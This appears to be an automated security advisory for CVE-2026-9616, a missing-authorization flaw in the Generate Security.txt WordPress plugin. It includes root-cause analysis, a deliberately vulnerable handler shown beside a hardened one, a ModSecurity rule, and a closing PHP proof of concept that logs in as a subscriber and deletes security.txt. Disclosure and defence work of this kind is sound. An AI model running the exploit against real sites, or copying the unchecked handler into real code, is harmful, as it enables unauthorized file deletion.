Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 23, 2026

CVE-2026-9616: Generate Security.txt <= 1.0.12 Missing Authorization to Authenticated (Subscriber+) Security.txt Deletion via delete_securitytxt AJAX Action PoC, Patch Analysis & Rule

CVE ID: CVE-2026-9616
Severity: Medium (CVSS 4.3)
CWE: CWE-862 (Missing Authorization)
Vulnerable Version: <= 1.0.12
Patched Version:
Disclosed: June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9616 (metadata-based):

This vulnerability resides in the Generate Security.txt plugin for WordPress (versions up to 1.0.12). It allows an authenticated attacker with subscriber-level access to delete the server’s security.txt file or create the .well-known directory via AJAX actions. The CVSS score is 4.3 (Medium), with low complexity and no user interaction required. The classification points to missing authorization, meaning the plugin failed to verify user capabilities before executing the privileged actions.

Root Cause: The CWE-862 classification indicates the plugin does not enforce capability checks on the delete_securitytxt and create_wellknown_folder AJAX handlers. In WordPress, a callback registered on a wp_ajax_{action} hook runs for any logged-in user, whatever their role, so an AJAX action that modifies sensitive data must itself verify that the current user holds an appropriate capability (e.g. manage_options). The plugin most likely registered the handlers via wp_ajax_ hooks without calling current_user_can() or an equivalent check. The vulnerability description names these two AJAX actions explicitly, so the missing authorization check on their handlers is the core problem identified by Atomic Edge analysis.

Exploitation: An attacker with a valid subscriber account can send a POST request to /wp-admin/admin-ajax.php with the action parameter set to delete_securitytxt. The plugin will then attempt to remove the security.txt file from the server's filesystem. Similarly, setting action to create_wellknown_folder will create the .well-known directory. No parameters beyond action are needed, because the handlers run the file operation unconditionally once the hook fires. If the plugin does not verify a nonce, the attacker does not need one either, which is typical for missing authorization vulnerabilities; and even where a nonce is checked, it is a CSRF token rather than an authorization control, so a logged-in user who can obtain one is still not stopped. Note also that admin-ajax.php reads action from $_REQUEST, so the same handlers are reachable with a GET request or with action placed in the query string.

Remediation: The fix must add capability checks to both AJAX handlers. Each handler should call current_user_can('manage_options') or a similar high-privilege capability before executing the file operation and stop (for example via wp_send_json_error() with a 403 status) when the check fails. Modifying the site's security policy file is an administrative operation, so restricting both actions to administrators is the appropriate level. Without code access, Atomic Edge research cannot confirm whether the plugin uses nonces, but verifying a nonce with check_ajax_referer() in addition to the capability check gives defense in depth: the capability check is the authorization fix, and the nonce protects the administrator against cross-site request forgery.
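To make the root cause and the fix concrete, the following is an added example written for this page; it is not code from the Generate Security.txt plugin. It shows the handler shape that CWE-862 describes beside a hardened version, with a small simulation of admin-ajax.php dispatch so it runs from the PHP CLI without WordPress. The function names (ae_*), the nonce action 'securitytxt_admin', the nonce value and the sample security.txt content are all assumptions; only the AJAX action name delete_securitytxt comes from the advisory.

```php
<?php
// Added example, not code from the Generate Security.txt plugin: the shape of a
// wp_ajax_ handler with the CWE-862 defect beside a hardened version. Function
// names (ae_*) and the nonce action 'securitytxt_admin' are hypothetical; only the
// AJAX action name delete_securitytxt comes from the advisory.

// Stand-ins so the file runs from the CLI outside WordPress (constructed for the
// example; inside WordPress this block is skipped and the real functions are used).
if ( ! function_exists( 'add_action' ) ) {
    define( 'ABSPATH', sys_get_temp_dir() . '/ae-wp-' . getmypid() . '/' );
    define( 'AE_NONCE', 'f3a9c1d2e4' );   // the one nonce value the stand-in accepts (assumed)
    $GLOBALS['ae_caps']  = [];            // capabilities of the simulated current user
    $GLOBALS['ae_hooks'] = [];

    // wp_send_json_* end the request in WordPress; here they throw so the caller can inspect the result.
    class AeJsonResponse extends Exception {
        public $status;
        public $payload;
        public function __construct( $status, $payload ) {
            parent::__construct( 'json response' );
            $this->status  = $status;
            $this->payload = $payload;
        }
    }
    function add_action( $hook, $callback ) { $GLOBALS['ae_hooks'][ $hook ] = $callback; }
    function current_user_can( $capability ) { return in_array( $capability, $GLOBALS['ae_caps'], true ); }
    function wp_send_json_success( $data = null ) { throw new AeJsonResponse( 200, $data ); }
    function wp_send_json_error( $data = null, $status_code = 200 ) { throw new AeJsonResponse( $status_code, $data ); }
    function check_ajax_referer( $action, $query_arg = false, $stop = true ) {
        $sent  = (string) ( $_POST[ $query_arg ?: '_ajax_nonce' ] ?? '' );
        $valid = hash_equals( AE_NONCE, $sent );   // the stand-in ignores $action
        if ( ! $valid && $stop ) { wp_send_json_error( 'invalid nonce', 403 ); }
        return $valid;
    }
}

$securitytxt = ABSPATH . '.well-known/security.txt';

// Vulnerable shape (what CWE-862 describes): the callback assumes that reaching the
// wp_ajax_ hook is authorization enough. It is not: wp_ajax_{action} fires for every
// logged-in user, subscribers included.
function ae_vulnerable_delete_securitytxt() {
    global $securitytxt;
    if ( file_exists( $securitytxt ) ) { unlink( $securitytxt ); }
    wp_send_json_success( 'security.txt deleted' );
}

// Hardened shape: capability check first (the authorization fix), nonce second (CSRF
// protection for the administrator), file operation last.
function ae_hardened_delete_securitytxt() {
    global $securitytxt;
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }
    check_ajax_referer( 'securitytxt_admin', 'nonce' );
    if ( file_exists( $securitytxt ) ) { unlink( $securitytxt ); }
    wp_send_json_success( 'security.txt deleted' );
}

// How the fixed handler would be wired up in the plugin.
add_action( 'wp_ajax_delete_securitytxt', 'ae_hardened_delete_securitytxt' );

// Simulate one admin-ajax.php request: recreate a sample security.txt, run the handler
// as a user with the given capabilities and POST body, and report the HTTP status and
// whether the file survived.
function ae_simulate( callable $handler, array $caps, array $post ) {
    global $securitytxt;
    if ( ! is_dir( dirname( $securitytxt ) ) ) { mkdir( dirname( $securitytxt ), 0700, true ); }
    file_put_contents( $securitytxt, "Contact: mailto:security@example.com\n" );   // constructed sample file
    $GLOBALS['ae_caps'] = $caps;
    $_POST = $post;
    try {
        $handler();
    } catch ( AeJsonResponse $response ) {
        return [ $response->status, file_exists( $securitytxt ) ];
    }
    return [ 0, file_exists( $securitytxt ) ];   // not reached: both handlers end in wp_send_json_*
}

if ( PHP_SAPI === 'cli' && ! defined( 'WPINC' ) ) {
    $cases = [
        [ 'vulnerable handler, subscriber, no nonce', 'ae_vulnerable_delete_securitytxt', [ 'read' ], [] ],
        [ 'hardened handler, subscriber, no nonce',   'ae_hardened_delete_securitytxt',   [ 'read' ], [] ],
        [ 'hardened handler, admin, no nonce',        'ae_hardened_delete_securitytxt',   [ 'manage_options' ], [] ],
        [ 'hardened handler, admin, valid nonce',     'ae_hardened_delete_securitytxt',   [ 'manage_options' ], [ 'nonce' => AE_NONCE ] ],
    ];
    foreach ( $cases as [ $label, $handler, $caps, $post ] ) {
        $post['action'] = 'delete_securitytxt';
        [ $status, $intact ] = ae_simulate( $handler, $caps, $post );
        printf( "%-45s HTTP %d, security.txt intact: %s\n", $label, $status, $intact ? 'yes' : 'no' );
    }
    @unlink( $securitytxt );
    @rmdir( dirname( $securitytxt ) );
    @rmdir( ABSPATH );
}
```

Run it with php on the command line. The first case is the advisory's scenario: a user holding only the subscriber's read capability reaches the vulnerable handler and the file is gone. The second case shows the capability check alone stopping that user, and the third and fourth show why the nonce is an extra layer rather than the fix: an administrator without a nonce is refused, an administrator with one succeeds, and a subscriber never gets past the first check regardless of the nonce.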

Impact: Exploitation allows an authenticated subscriber to delete the security.txt file, which removes contact information and security policy details from the site. This could interfere with responsible disclosure processes and security researcher communications. The impact is limited to file manipulation on the filesystem, with no data exposure or privilege escalation. The CVSS impact metrics confirm only integrity is affected at a low level.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE. Note that the rule cannot tell a subscriber from an administrator: it blocks the two AJAX actions for every client, so the plugin's own administrative use of them is blocked as well. Treat it as a virtual patch until the plugin is updated.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-9616 (metadata-based)
# Blocks attempts to exploit the missing authorization vulnerability in Generate Security.txt plugin
# Targets the delete_securitytxt and create_wellknown_folder AJAX actions without proper capability checks
# REQUEST_FILENAME (no query string) is matched instead of REQUEST_URI, so admin-ajax.php?x=1 cannot slip past.
# ARGS:action covers both the POST body and the query string, because admin-ajax.php reads action from
# $_REQUEST and dispatches wp_ajax_ hooks for GET as well as POST requests.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9616 - Generate Security.txt Missing Authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-9616'"
  SecRule ARGS:action "@rx ^(?:delete_securitytxt|create_wellknown_folder)$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9616 - Generate Security.txt <= 1.0.12 - Missing Authorization to Authenticated (Subscriber+) Security.txt Deletion via delete_securitytxt AJAX Action

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$username = 'subscriber'; // WordPress user with subscriber role
$password = 'subscriber_password'; // Password for the subscriber account

// Initialize cURL
$ch = curl_init();

// Step 1: Authenticate as subscriber
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: Invoke the delete_securitytxt AJAX action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'delete_securitytxt'
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);

// Check response. admin-ajax.php replies "0" with HTTP 400 when no handler is
// registered for the requested action (plugin absent or deactivated).
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "HTTP Code: $http_code\n";
echo "Response: " . htmlspecialchars($response) . "\n";

// Optionally invoke the create_wellknown_folder AJAX action
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'create_wellknown_folder'
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response2 = curl_exec($ch);

echo "HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "\n";
echo "Response: " . htmlspecialchars($response2) . "\n";

// Clean up
curl_close($ch);
unlink('/tmp/cookies.txt');
